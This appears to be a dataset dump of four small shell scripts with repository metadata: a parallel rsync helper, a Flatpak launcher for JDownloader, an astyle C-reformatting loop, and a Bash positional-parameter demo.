0f8116db5ea35ce7c3b3abc2301e0726d5dfe20a | Shell | sammcj/scripts | /OLD/prsync.sh | UTF-8 | 520 | 3.171875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Parallel rsync: mirror SRCDIR's structure to DESTDIR, then copy the
# individual files with several rsync processes in parallel.
# Usage: prsync.sh <srcdir> <destdir>
# SETUP OPTIONS
export SRCDIR=$1 # "/Volumes/RAID10/music"
export DESTDIR=$2 # "/Volumes/bigdata/music"
export THREADS="8"
# RSYNC TOP LEVEL FILES AND DIRECTORY STRUCTURE
rsync -lptgoDvzd "$SRCDIR" "$DESTDIR"
# FIND ALL FILES AND PASS THEM TO MULTIPLE RSYNC PROCESSES
#cd "$SRCDIR" || exit; find . -type f -print0 | xargs -n1 -P$THREADS -I% rsync -r -numeric-ids -e "ssh -T -o Compression=no -x" % "$DESTDIR"%
# NOTE(review): the line below looks broken - "%remotehost:" glues the found
# file name onto the literal word "remotehost" with no space or real host,
# so rsync receives a single malformed argument. The commented-out variant
# above shows the likely intended form; confirm and fix.
cd $SRCDIR; find . -type f | xargs -n1 -P$THREADS -I% rsync -r %remotehost:/$DESTDIR/%
| true |
f3c290869e7494705ceee4dc09e404746779280d | Shell | flathub/org.jdownloader.JDownloader | /jd-wrapper.sh | UTF-8 | 437 | 3.125 | 3 | [] | no_license | #!/bin/bash
# Flatpak-style launcher for JDownloader: on first run, extract
# JDownloader.jar via the bundled installer, then exec the application.
JDDIR=${XDG_DATA_HOME}/jdownloader
JDSETUP=${XDG_CACHE_HOME}/JD2Setup.sh
# First run: JDownloader.jar is not yet installed.
if [ ! -f ${JDDIR}/JDownloader.jar ]; then
# Copy the bundled installer somewhere writable and make it executable.
install -Dm755 /app/extra/JD2Setup.sh ${JDSETUP}
# Run the installer quietly; zenity shows a pulsating progress dialog.
${JDSETUP} -q -dir ${JDDIR}/tmp | zenity --progress --text="Installing JDownloader" --pulsate --no-cancel --auto-close
mv ${JDDIR}/tmp/JDownloader.jar ${JDDIR}
rm -rf ${JDSETUP} ${JDDIR}/tmp
fi
# Replace this shell with the Java process, forwarding all arguments.
exec java -jar ${JDDIR}/JDownloader.jar "${@}"
| true |
14f241236e63deab37223adc21292ef03d4ed6ea | Shell | pengjia-git/code | /shell_script/astyle.sh | UTF-8 | 185 | 2.65625 | 3 | [] | no_license | #! /bin/bash
# Reformat every C source/header under temp/ with astyle (ANSI style).
# Fixes two bugs in the original:
#  - the -name tests are now parenthesized; without grouping, "-type f"
#    bound only to the second -name ('*.h'), so directories matching
#    '*.c' could slip through and '*.c' files were not filtered to files;
#  - files are streamed NUL-delimited instead of word-splitting $(find),
#    which broke on paths containing whitespace.
find temp \( -name '*.c' -o -name '*.h' \) -type f -print0 |
while IFS= read -r -d '' f; do
  #astyle --style=ansi --indent=spaces=4 -M80 -p -D -H -c -w -n "$f"
  astyle --style=ansi -bps4 -M80 -w "$f"
done
| true |
a5e25f67792e6e6f49fc45da6b26e5bf5e58b766 | Shell | NoelTejeda/Bash | /prácticas/parametros.sh | UTF-8 | 542 | 3.171875 | 3 | [] | no_license | #echo el primer parámetro es $1
# Demo of Bash positional and special parameters.
# (Original comments translated from Spanish.)
#echo the number of parameters was $#
#echo all the parameters are $*
#-------------------------
# $n = the value of one specific parameter, where n is the parameter number
# $* = all the parameters: one list with an element per received parameter
# $# = the number of parameters the script was invoked with.
:'echo estos son los parametros a colocar
echo $1
echo $2
echo $9
echo ${10}'
# NB: the `:'...'` above is a no-op colon command whose quoted argument
# "comments out" that echo block; it is code, so it is left untouched.
# NOTE(review): the label below says "the script name is" but prints the
# first five *arguments*, not $0 - confirm the intended wording.
echo "el nombre del script es: $1 $2 $3 $4 $5"
# Number of arguments received.
echo $#
# Exit status of the previous command (the echo above, so always 0 here).
echo $?
# All arguments as a single word-split list.
echo $*
echo $@ | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.